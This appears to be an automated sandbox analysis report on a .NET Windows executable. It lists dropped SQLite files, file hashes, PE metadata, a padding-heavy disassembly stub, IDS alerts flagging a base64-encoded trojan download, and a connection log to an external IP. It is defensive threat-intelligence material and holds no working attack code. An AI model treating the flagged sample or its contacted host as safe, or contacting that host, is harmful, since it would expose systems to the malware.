                                                            MD5:2D7ACA56B5F340F28DD1D2B46D700BA6
                                                            SHA1:3966684FF029665614B8DC948349178FB9E8C078
                                                            SHA-256:B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
                                                            SHA-512:D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
                                                            Malicious:false
                                                            Preview:ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):49152
                                                            Entropy (8bit):0.7876734657715041
                                                            Encrypted:false
                                                            SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                            MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                            SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                            SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                            SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):49152
                                                            Entropy (8bit):0.7876734657715041
                                                            Encrypted:false
                                                            SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                            MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                            SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                            SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                            SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):49152
                                                            Entropy (8bit):0.7876734657715041
                                                            Encrypted:false
                                                            SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                            MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                            SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                            SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                            SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):5.433796373508295
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:StZAEFSb2j.exe
                                                            File size:43520
                                                            MD5:c71616e2b7cedf9fc8e2ca6f6929abdf
                                                            SHA1:896a4c41792c73db51074ccff5ef3f0577f510c5
                                                            SHA256:4a9f8a3b847fa9d2e854d3a7235ddee8e4c093d04c3901f006d430be1060fae5
                                                            SHA512:bcf06478805a8c0b047304989a76a9a6d5380b148524c12eb8e1e2acebead20bc42a969992a332b9ab33e6644ef2e0aaf4d1933f84cbcfccd2d86995310f58ef
                                                            SSDEEP:768:A5588dpB2Gaq7kvl4VPNznshp/xzVmzOMdcGMN75H16U8S4riXzjla:C58K97kuVPRn+/xJm65GMN7FMuBzjo
                                                            TLSH:9113B99D766072DFC85BC0729EA82C68EB60747B931B8243942715ADDE0DA97CF080F3
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^cc..............0.................. ........@.. ....................................`................................
                                                            Icon Hash:00828e8e8686b000
                                                            Entrypoint:0x40bebe
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x63635E1E [Thu Nov 3 06:22:22 2022 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbe70 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x5a6 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xbe2c | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x9ec4 | 0xa000 | False | 0.41630859375 | data | 5.4639881643435775 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x5a6 | 0x600 | False | 0.4186197916666667 | data | 4.114149153750449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe000 | 0xc | 0x200 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xc0a0 | 0x31c | data | |
RT_MANIFEST | 0xc3bc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | |
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/03/22-12:44:38.337914 | UDP | 2012811 | ET DNS Query to a .tk domain - Likely Hostile | 56572 | 53 | 192.168.2.4 | 8.8.8.8
11/03/22-12:44:39.556293 | TCP | 2018856 | ET TROJAN Windows executable base64 encoded | 443 | 49695 | 50.115.174.192 | 192.168.2.4
11/03/22-12:44:40.820043 | TCP | 2018856 | ET TROJAN Windows executable base64 encoded | 443 | 49696 | 50.115.174.192 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 3, 2022 12:44:38.407645941 CET | 49695 | 443 | 192.168.2.4 | 50.115.174.192
Nov 3, 2022 12:44:38.407692909 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:38.407783985 CET | 49695 | 443 | 192.168.2.4 | 50.115.174.192
Nov 3, 2022 12:44:38.469727039 CET | 49695 | 443 | 192.168.2.4 | 50.115.174.192
Nov 3, 2022 12:44:38.469760895 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:38.837925911 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:38.838049889 CET | 49695 | 443 | 192.168.2.4 | 50.115.174.192
Nov 3, 2022 12:44:38.853115082 CET | 49695 | 443 | 192.168.2.4 | 50.115.174.192
Nov 3, 2022 12:44:38.853154898 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:38.853569031 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:38.896302938 CET | 49695 | 443 | 192.168.2.4 | 50.115.174.192
Nov 3, 2022 12:44:39.378637075 CET | 49695 | 443 | 192.168.2.4 | 50.115.174.192
Nov 3, 2022 12:44:39.378685951 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.556324959 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.556360006 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.556368113 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.556541920 CET | 49695 | 443 | 192.168.2.4 | 50.115.174.192
Nov 3, 2022 12:44:39.556580067 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.604000092 CET | 49695 | 443 | 192.168.2.4 | 50.115.174.192
Nov 3, 2022 12:44:39.732975006 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.732997894 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.733069897 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.733079910 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.733130932 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.733139992 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.733177900 CET | 49695 | 443 | 192.168.2.4 | 50.115.174.192
Nov 3, 2022 12:44:39.733206987 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.733226061 CET | 49695 | 443 | 192.168.2.4 | 50.115.174.192
Nov 3, 2022 12:44:39.787089109 CET | 49695 | 443 | 192.168.2.4 | 50.115.174.192
Nov 3, 2022 12:44:39.907883883 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.907963991 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.907995939 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.908026934 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.908195972 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.908226967 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.908267975 CET | 49695 | 443 | 192.168.2.4 | 50.115.174.192
Nov 3, 2022 12:44:39.908303022 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.908324957 CET | 49695 | 443 | 192.168.2.4 | 50.115.174.192
Nov 3, 2022 12:44:39.908340931 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.908396006 CET | 49695 | 443 | 192.168.2.4 | 50.115.174.192
